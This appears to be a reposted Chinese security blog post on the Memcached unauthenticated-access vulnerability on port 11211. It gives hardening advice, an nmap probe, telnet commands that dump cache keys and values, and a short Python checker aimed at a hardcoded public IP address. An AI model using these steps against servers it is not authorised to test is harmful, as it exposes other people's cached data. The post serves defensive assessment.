ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Memcache未授权访问漏洞

2022-07-14 00:00:29  阅读:159  来源: 互联网

标签:stats socket 漏洞 11211 Memcache 授权 memcached


Memcache未授权访问漏洞

漏洞名称:Memcache未授权访问漏洞

漏洞描述:memcache未授权访问漏洞,默认的 11211 端口不需要密码即可访问,攻击者可获取数据库中信息,造成严重的信息泄露。

漏洞成因:由于memcached安全设计缺陷,客户端连接memcached服务器后无需认证就可读取、修改服务器缓存内容。

漏洞危害:除memcached中数据可被直接读取泄漏和恶意修改外,由于memcached中的数据像正常网站用户访问提交变量一样会被后端代码处理,当处理代码存在缺陷时会再次导致不同类型的安全问题。

安全建议:

一、配置memcached监听本地回环地址127.0.0.1。
1 . vim /etc/sysconfig/memcached
2 . OPTIONS="-l 127.0.0.1" #设置本地为监听
3 . /etc/init.d/memcached restart #重启服务

二、如果业务要求指示必须通过Internet公开服务时,可使用主机防火墙(iptalbes、firewalld等)和网络防火墙对memcached服务端口进行过滤。

漏洞探测:

nmap -sV -p 11211 –script memcached-info <target>

漏洞验证:

当系统存在11211端口(此处从fofa.so搜索port = "11211")

telnet连接目标11211端口

# stats  //查看memcache 服务状态
# stats items  //查看所有items
# stats cachedump 32 0  //获得缓存key
# get :state:264861539228401373:261588   //通过key读取相应value ,获得实际缓存内容,造成敏感信息泄露

示例:

stats:

image

stats items

image

stats cachedump 42 1

image

漏洞利用POC:

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import socket
def Memcache_check(ip, port=11211, timeout=30):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send("stats\r\n")
        result = s.recv(1024)
        print result
        if "STAT version" in result:
            print '[+] Memcache Unauthorized: ' +ip+':'+str(port)
    except Exception, e:
        print 'time out error'
        pass
if __name__ == '__main__':
    Memcache_check("114.132.245.40")

image

标签:stats,socket,漏洞,11211,Memcache,授权,memcached
来源: https://www.cnblogs.com/TiramisuPS/p/16476083.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有